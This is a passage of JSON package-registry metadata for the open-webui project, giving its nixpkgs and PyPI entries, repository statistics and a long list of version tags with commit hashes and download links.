ries/nixpkgs-24.05/packages/open-webui/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/open-webui/codemeta","maintainers":[{"uuid":"shivaraj-bh","login":null,"name":"Shivaraj B H","email":"sbh69840@gmail.com","url":"https://github.com/shivaraj-bh","packages_count":4,"html_url":null,"role":null,"created_at":"2026-03-06T23:12:18.536Z","updated_at":"2026-03-06T23:12:18.536Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/maintainers/shivaraj-bh/packages"}],"registry":{"name":"nixpkgs-24.05","url":"https://channels.nixos.org/nixos-24.05","ecosystem":"nixpkgs","default":false,"packages_count":116156,"maintainers_count":3383,"namespaces_count":0,"keywords_count":654,"github":"NixOS","metadata":{"funded_packages_count":3622},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.309Z","updated_at":"2026-09-03T05:02:00.569Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/namespaces"}},{"id":10033852,"name":"open-webui","ecosystem":"pypi","description":"Open WebUI","homepage":null,"licenses":"Other/Proprietary License","normalized_licenses":["OML"],"repository_url":"https://github.com/open-webui/open-webui","keywords_array":[],"namespace":null,"versions_count":173,"first_release_published_at":"2024-05-20T08:24:22.000Z","latest_release_published_at":"2026-08-31T15:01:59.000Z","latest_release_number":"0.11.3","last_synced_at":"2026-09-02T13:24:42.079Z","created_at":"2024-05-20T08:32:20.556Z","updated_at":"2026-09-03T04:16:54.220Z","registry_url":"https://pypi.org/project/open-webui/","install_command":"pip install open-webui --index-url https://pypi.org/simple","documentation_url":"https://open-webui.readthedocs.io/","metadata":{"funding":null,"documentation":null,"classifiers":["Development Status :: 4 - Beta","License :: Other/Proprietary License","Programming Language :: Python :: 3","Programming Language :: Python :: 3.11","Programming Language :: Python :: 3.12","Topic :: Communications :: Chat","Topic :: Multimedia"],"normalized_name":"open-webui","project_status":null},"repo_metadata":{"id":199152863,"uuid":"701547123","full_name":"open-webui/open-webui","owner":"open-webui","description":"User-friendly AI Interface (Supports Ollama, OpenAI API, ...)","archived":false,"fork":false,"pushed_at":"2026-08-29T20:14:33.000Z","size":413073,"stargazers_count":150350,"open_issues_count":231,"forks_count":21950,"subscribers_count":651,"default_branch":"main","last_synced_at":"2026-08-30T01:19:17.441Z","etag":null,"topics":["ai","llm","llm-ui","llm-webui","llms","mcp","ollama","ollama-webui","open-webui","openai","openapi","rag","self-hosted","ui","webui"],"latest_commit_sha":null,"homepage":"https://openwebui.com","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/open-webui.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"docs/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":null,"gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":"CONTRIBUTOR_LICENSE_AGREEMENT","disclosure":null},"funding":{"github":"open-webui"}},"created_at":"2023-10-06T22:08:27.000Z","updated_at":"2026-08-30T00:41:23.000Z","dependencies_parsed_at":"2026-08-15T05:21:06.356Z","dependency_job_id":null,"html_url":"https://github.com/open-webui/open-webui","commit_stats":{"total_commits":4572,"total_committers":249,"mean_commits":18.36144578313253,"dds":0.3506124234470691,"last_synced_commit":"1d225dd804575af9ae5981528dfdce695f7f7040"},"previous_names":["ollama-webui/ollama-webui","open-webui/open-webui"],"tags_count":167,"template":false,"template_full_name":null,"purl":"pkg:github/open-webui/open-webui","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/open-webui","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":37001766,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-31T02:00:07.497Z","response_time":119,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"open-webui","name":"Open WebUI","uuid":"158137808","kind":"organization","description":"On a mission to build the best AI user interface.","email":"support@openwebui.com","website":"https://openwebui.com","location":null,"twitter":"OpenWebUI","company":null,"icon_url":"https://avatars.githubusercontent.com/u/158137808?v=4","repositories_count":25,"last_synced_at":"2026-08-22T19:45:41.038Z","metadata":{"has_sponsors_listing":true,"funding":null},"html_url":"https://github.com/open-webui","funding_links":["https://github.com/sponsors/open-webui"],"total_stars":164651,"followers":5228,"following":0,"created_at":"2024-02-17T08:24:26.070Z","updated_at":"2026-08-22T19:45:41.055Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/open-webui","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/open-webui/repositories"},"tags":[{"name":"v0.11.0","sha":"f9590b8017199e56d5e953657e6498e3cef1d246","kind":"commit","published_at":"2026-07-27T09:30:03.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.11.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.11.0/manifests"},{"name":"v0.10.2","sha":"ecd48e2f718220a6400ecf49eafd4867a38feb10","kind":"commit","published_at":"2026-07-01T08:40:54.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.10.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"b711935dd57dbc223ebbf410175a8bbe7e4efafb","kind":"commit","published_at":"2026-06-29T19:38:32.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.10.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"4d2e13cf2bcc451b33bb6374bea4d2163e6cc94c","kind":"commit","published_at":"2026-06-29T19:17:36.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.10.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.10.0/manifests"},{"name":"v0.9.6","sha":"1a97751e376e00a1897bc3679215ae1c7bd8fd42","kind":"commit","published_at":"2026-06-02T02:09:44.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.9.6","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"3660bc00fd807deced3400a63bfa6db47811a3bb","kind":"commit","published_at":"2026-05-10T18:13:55.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.9.5","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"f51d2b026f1b0e7283b15f093412be8b67d24770","kind":"commit","published_at":"2026-05-09T07:50:05.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.9.4","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"adc9076d176679fd913c5dc44d0bd4d8f86d1fc3","kind":"commit","published_at":"2026-05-09T07:17:07.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.9.3","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"8dae237a0bfdac4b7f55b463b3e2769ea4b94a0b","kind":"commit","published_at":"2026-04-24T09:56:03.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.9.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"0a8a620fb6fd4c914494f56ac06475bd5f95a985","kind":"commit","published_at":"2026-04-21T10:45:24.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.9.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"f31768e20e5c6b4f6da0ef657877298b359936cf","kind":"commit","published_at":"2026-04-21T07:56:01.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.9.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.0/manifests"},{"name":"v0.8.12","sha":"9bd84258d09eefe7bf975878fb0e31a5dadfe0f8","kind":"commit","published_at":"2026-03-27T00:26:39.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.12","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.12/manifests"},{"name":"v0.8.11","sha":"4d058a125b17eb57212af5eab98d683548d546e3","kind":"commit","published_at":"2026-03-25T22:49:59.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.11","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.11/manifests"},{"name":"v0.8.10","sha":"e4e69a10ec08a725bf2ab3db499ef664f2bd7570","kind":"commit","published_at":"2026-03-09T00:09:43.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.10","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.10/manifests"},{"name":"v0.8.9","sha":"6c159a97b7efdfdbfa262ebd26823a2d695b561d","kind":"commit","published_at":"2026-03-08T02:56:22.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.9","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.9/manifests"},{"name":"v0.8.8","sha":"79f04379801622181ef9c591374a285eac4e1c4d","kind":"commit","published_at":"2026-03-02T23:32:58.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.8","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.8/manifests"},{"name":"v0.8.7","sha":"6137f7cb7ecda49d5fa6857c5e9fa8942dda6b23","kind":"commit","published_at":"2026-03-02T01:14:08.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.7","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.7/manifests"},{"name":"v0.8.6","sha":"9c9a18d6d4311ff246d5d1345d94581bf25c604b","kind":"commit","published_at":"2026-03-01T21:03:55.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.6","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"1ac3dd4a893e13803e7b889611303c4a7a5cc470","kind":"commit","published_at":"2026-02-23T09:26:21.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.5","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"2ed3055c42ae18e3372081c18629963b0e244a62","kind":"commit","published_at":"2026-02-23T07:58:08.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.4","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"b8112d72b95e480f946f0688bed29321b61e65af","kind":"commit","published_at":"2026-02-17T07:25:39.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.3","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"7c7fe443289c3d0307ebbcf320fb1d895c3ee79b","kind":"commit","published_at":"2026-02-16T07:37:13.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"883f1dda0f18fbe26aca7aed5a8804021a3685ca","kind":"commit","published_at":"2026-02-14T00:04:11.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"7a7a25766c3dc13fa85544a93d011e00b7c0b2b4","kind":"commit","published_at":"2026-02-12T23:42:25.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.0/manifests"},{"name":"v0.7.2","sha":"2b26355002064228e9b671339f8f3fb9d1fafa73","kind":"commit","published_at":"2026-01-10T21:00:01.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.7.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"f2a360cb87cc395a0195e1b57ff7272400db3bee","kind":"commit","published_at":"2026-01-09T20:57:39.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.7.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"6adde203cd292a9e3af9c64a2ae36b603fed096a","kind":"commit","published_at":"2026-01-09T18:51:34.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.7.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.7.0/manifests"},{"name":"v0.6.43","sha":"a7271532f8a38da46785afcaa7e65f9a45e7d753","kind":"commit","published_at":"2025-12-22T06:03:34.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.43","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.43","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.43","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.43","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.43/manifests"},{"name":"v0.6.42","sha":"d95f533214e3fe5beb5e41ec1f349940bc4c7043","kind":"commit","published_at":"2025-12-21T21:08:58.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.42","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.42","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.42","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.42","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.42/manifests"},{"name":"v0.6.41","sha":"6f1486ffd0cb288d0e21f41845361924e0d742b3","kind":"commit","published_at":"2025-12-02T22:28:46.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.41","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.41","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.41","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.41","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.41/manifests"},{"name":"v0.6.40","sha":"140605e660b8186a7d5c79fb3be6ffb147a2f498","kind":"commit","published_at":"2025-11-25T11:01:33.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.40","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.40","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.40","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.40","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.40/manifests"},{"name":"v0.6.39","sha":"9899293f050ad50ae12024cbebee7e018acd851e","kind":"commit","published_at":"2025-11-25T10:31:34.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.39","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.39","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.39","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.39","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.39/manifests"},{"name":"v0.6.38","sha":"e3faec62c58e3a83d89aa3df539feacefa125e0c","kind":"commit","published_at":"2025-11-24T12:00:31.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.38","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.38","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.38","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.38","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.38/manifests"},{"name":"v0.6.37","sha":"fe6783c16699911c7be17392596d579333fb110c","kind":"commit","published_at":"2025-11-24T03:10:05.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.37","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.37","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.37","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.37","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.37/manifests"},{"name":"v0.6.36","sha":"e0d5de16978786b8a7538adf1efcde5258f38faf","kind":"commit","published_at":"2025-11-06T21:45:23.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.36","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.36","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.36","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.36","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.36/manifests"},{"name":"v0.6.35","sha":"e85c7f79310f351672fe967a102396b6f3f5e88b","kind":"commit","published_at":"2025-11-06T18:40:46.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.35","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.35","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.35","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.35","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.35/manifests"},{"name":"v0.6.34","sha":"9ae06a3cac140673cb93895bab37846095e71059","kind":"commit","published_at":"2025-10-16T16:55:47.000Z","download_url":